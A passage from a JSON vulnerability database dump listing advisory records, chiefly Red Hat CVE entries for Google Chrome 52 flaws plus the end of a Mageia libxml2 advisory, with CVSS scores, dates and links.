may be read but other files may not be opened, which makes it easier for remote attackers to conduct XML External Entity (XXE) attacks via a crafted document (CVE-2016-9318). Heap buffer overflow in xmlAddID (CVE-2017-0663). Integer overflow in memory debug code in libxml2 before 2.9.5 (CVE-2017-5130). NULL pointer deref in xmlDumpElementContent (CVE-2017-5969). Prevent unwanted external entity reference (CVE-2017-7375). Increase buffer space for port in HTTP redirect support (CVE-2017-7376). The function xmlSnprintfElementContent in valid.c was vulnerable to a stack buffer overflow (CVE-2017-9047, CVE-2017-9048). The function xmlDictComputeFastKey in dict.c was vulnerable to a heap-based buffer over-read (CVE-2017-9049). The function xmlDictAddString was vulnerable to a heap-based buffer over-read (CVE-2017-9050). It was discovered that libxml2 incorrecty handled certain files. An attacker could use this issue with specially constructed XML data to cause libxml2 to consume resources, leading to a denial of service (CVE-2017-15412). Wei Lei discovered that libxml2 incorrecty handled certain parameter entities. An attacker could use this issue with specially constructed XML data to cause libxml2 to consume resources, leading to a denial of service (CVE-2017-16932). The libxml2 package has been updated to version 2.9.7 to fix these issues and several other bugs. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-03T15:50:51", "type": "mageia", "title": "Updated libxml2 & perl-XML-LibXML packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4658", "CVE-2016-5131", "CVE-2016-9318", "CVE-2017-0663", "CVE-2017-15412", "CVE-2017-16932", "CVE-2017-5130", "CVE-2017-5969", "CVE-2017-7375", "CVE-2017-7376", "CVE-2017-9047", "CVE-2017-9048", "CVE-2017-9049", "CVE-2017-9050"], "modified": "2018-01-03T15:50:51", "id": "MGASA-2018-0048", "href": "https://advisories.mageia.org/MGASA-2018-0048.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhatcve": [{"lastseen": "2021-09-02T22:53:46", "description": "Use-after-free vulnerability in extensions/renderer/user_script_injector.cc in the Extensions subsystem in Google Chrome before 52.0.2743.82 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to script deletion.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-21T08:19:31", "type": "redhatcve", "title": "CVE-2016-5136", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5136"], "modified": "2020-08-18T08:30:41", "id": "RH:CVE-2016-5136", "href": "https://access.redhat.com/security/cve/cve-2016-5136", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-03T01:51:13", "description": "ios/web/web_state/ui/crw_web_controller.mm in Google Chrome before 52.0.2743.82 on iOS does not ensure that an invalid URL is replaced with the about:blank URL, which allows remote attackers to spoof the URL display via a crafted web site.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-07-21T08:19:57", "type": "redhatcve", "title": "CVE-2016-1707", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1707"], "modified": "2019-12-03T03:47:58", "id": "RH:CVE-2016-1707", "href": "https://access.redhat.com/security/cve/cve-2016-1707", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-09-02T22:53:46", "description": "The Service Workers subsystem in Google Chrome before 52.0.2743.82 does not properly implement the Secure Contexts specification during decisions about whether to control a subframe, which allows remote attackers to bypass the Same Origin Policy via an https IFRAME element inside an http IFRAME element.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-21T08:19:11", "type": "redhatcve", "title": "CVE-2016-5132", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5132"], "modified": "2020-08-18T08:30:34", "id": "RH:CVE-2016-5132", "href": "https://access.redhat.com/security/cve/cve-2016-5132", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-02T22:53:46", "description": "The PPAPI implementation in Google Chrome before 52.0.2743.82 does not validate the origin of IPC messages to the plugin broker process that should have come from the browser process, which allows remote attackers to bypass a sandbox protection mechanism via an unexpected message type, related to broker_process_dispatcher.cc, ppapi_plugin_process_host.cc, ppapi_thread.cc, and render_frame_message_filter.cc.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 6.0}, "published": "2016-07-21T08:19:52", "type": "redhatcve", "title": "CVE-2016-1706", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1706"], "modified": "2020-08-18T08:27:45", "id": "RH:CVE-2016-1706", "href": "https://access.redhat.com/security/cve/cve-2016-1706", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-03T10:52:44", "description": "objects.cc in Google V8 before 5.2.361.27, as used in Google Chrome before 52.0.2743.82, does not prevent API interceptors from modifying a store target without setting a property, which allows remote attackers to bypass the Same Origin Policy via a crafted web site.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-21T08:18:30", "type": "redhatcve", "title": "CVE-2016-5128", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5128"], "modified": "2020-08-18T08:30:16", "id": "RH:CVE-2016-5128", "href": "https://access.redhat.com/security/cve/cve-2016-5128", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-03T01:51:13", "description": "Google Chrome before 52.0.2743.82 mishandles origin information during proxy authentication, which allows man-in-the-middle attackers to spoof a proxy-authentication login prompt or trigger incorrect credential storage by modifying the client-server data stream.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-07-21T08:19:05", "type": "redhatcve", "title": "CVE-2016-5133", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5133"], "modified": "2020-08-18T08:30:36", "id": "RH:CVE-2016-5133", "href": "https://access.redhat.com/security/cve/cve-2016-5133", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-09-02T22:53:46", "description": "The Chrome Web Store inline-installation implementation in the Extensions subsystem in Google Chrome before 52.0.2743.82 does not properly consider object lifetimes during progress observation, which allows remote attackers to cause a denial of service (use-after-free) or possibly have unspecified other impact via a crafted web site.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-21T08:19:38", "type": "redhatcve", "title": "CVE-2016-1708", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1708"], "modified": "2020-08-18T08:27:47", "id": "RH:CVE-2016-1708", "href": "https://access.redhat.com/security/cve/cve-2016-1708", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-02T22:53:45", "description": "Heap-based buffer overflow in the ByteArray::Get method in data/byte_array.cc in Google sfntly before 2016-06-10, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted SFNT font.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-21T08:19:42", "type": "redhatcve", "title": "CVE-2016-1709", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1709"], "modified": "2020-08-18T08:27:48", "id": "RH:CVE-2016-1709", "href": "https://access.redhat.com/security/cve/cve-2016-1709", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-02T22:53:45", "description": "Google V8 before 5.2.361.32, as used in Google Chrome before 52.0.2743.82, does not properly process left-trimmed objects, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-21T08:18:35", "type": "redhatcve", "title": "CVE-2016-5129", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5129"], "modified": "2020-08-18T08:30:21", "id": "RH:CVE-2016-5129", "href": "https://access.redhat.com/security/cve/cve-2016-5129", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-03T01:51:12", "description": "The ChromeClientImpl::createWindow method in WebKit/Source/web/ChromeClientImpl.cpp in Blink, as used in Google Chrome before 52.0.2743.82, does not prevent window creation by a deferred frame, which allows remote attackers to bypass the Same Origin Policy via a crafted web site.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-21T08:18:50", "type": "redhatcve", "title": "CVE-2016-1710", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1710"], "modified": "2020-08-18T08:27:51", "id": "RH:CVE-2016-1710", "href": "https://access.redhat.com/security/cve/cve-2016-1710", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-02T22:53:44", "description": "content/renderer/history_controller.cc in Google Chrome before 52.0.2743.82 does not properly restrict multiple uses of a JavaScript forward method, which allows remote attackers to spoof the URL display via a crafted web site.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-07-21T08:18:59", "type": "redhatcve", "title": "CVE-2016-5130", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5130"], "modified": "2020-08-18T08:30:21", "id": "RH:CVE-2016-5130", "href": "https://access.redhat.com/security/cve/cve-2016-5130", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-09-02T22:53:46", "description": "WebKit/Source/core/html/parser/HTMLPreloadScanner.cpp in Blink, as used in Google Chrome before 52.0.2743.82, does not consider referrer-policy information inside an HTML document during a preload request, which allows remote attackers to bypass the Content Security Policy (CSP) protection mechanism via a crafted web site, as demonstrated by a \"Content-Security-Policy: referrer origin-when-cross-origin\" header that overrides a \"\" element.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-07-21T08:19:16", "type": "redhatcve", "title": "CVE-2016-5135", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5135"], "modified": "2020-08-18T08:30:40", "id": "RH:CVE-2016-5135", "href": "https://access.redhat.com/security/cve/cve-2016-5135", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-09-03T04:42:43", "description": "WebKit/Source/core/loader/FrameLoader.cpp in Blink, as used in Google Chrome before 52.0.2743.82, does not disable frame navigation during a detach operation on a DocumentLoader object, which allows remote attackers to bypass the Same Origin Policy via a crafted web site.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-21T08:18:44", "type": "redhatcve", "title": "CVE-2016-1711", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1711"], "modified": "2020-08-18T08:27:56", "id": "RH:CVE-2016-1711", "href": "https://access.redhat.com/security/cve/cve-2016-1711", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-02T22:53:45", "description": "Use-after-free vulnerability in WebKit/Source/core/editing/VisibleUnits.cpp in Blink, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted JavaScript code involving an @import at-rule in a Cascading Style Sheets (CSS) token sequence in conjunction with a rel=import attribute of a LINK element.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-21T08:18:40", "type": "redhatcve", "title": "CVE-2016-5127", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5127"], "modified": "2020-08-18T08:30:15", "id": "RH:CVE-2016-5127", "href": "https://access.redhat.com/security/cve/cve-2016-5127", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-03T13:55:00", "description": "Multiple unspecified vulnerabilities in Google Chrome before 52.0.2743.82 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-21T08:20:01", "type": "redhatcve", "title": "CVE-2016-1705", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1705"], "modified": "2020-08-18T08:27:44", "id": "RH:CVE-2016-1705", "href": "https://access.redhat.com/security/cve/cve-2016-1705", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-03T04:42:43", "description": "The CSPSource::schemeMatches function in WebKit/Source/core/frame/csp/CSPSource.cpp in the Content Security Policy (CSP) implementation in Blink, as used in Google Chrome before 52.0.2743.82, does not apply http :80 policies to https :443 URLs and does not apply ws :80 policies to wss :443 URLs, which makes it easier for remote attackers to determine whether a specific HSTS web site has been visited by reading a CSP report. NOTE: this vulnerability is associated with a specification change after CVE-2016-1617 resolution.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 1.4}, "published": "2016-07-21T08:19:25", "type": "redhatcve", "title": "CVE-2016-5137", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1617", "CVE-2016-5137"], "modified": "2020-08-18T08:30:46", "id": "RH:CVE-2016-5137", "href": "https://access.redhat.com/security/cve/cve-2016-5137", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-09-02T22:53:46", "description": "net/proxy/proxy_service.cc in the Proxy Auto-Config (PAC) feature in Google Chrome before 52.0.2743.82 does not ensure that URL information is restricted to a scheme, host, and port, which allows remote attackers to discover credentials by operating a server with a PAC script, a related issue to CVE-2016-3763.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-21T08:19:21", "type": "redhatcve", "title": "CVE-2016-5134", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": 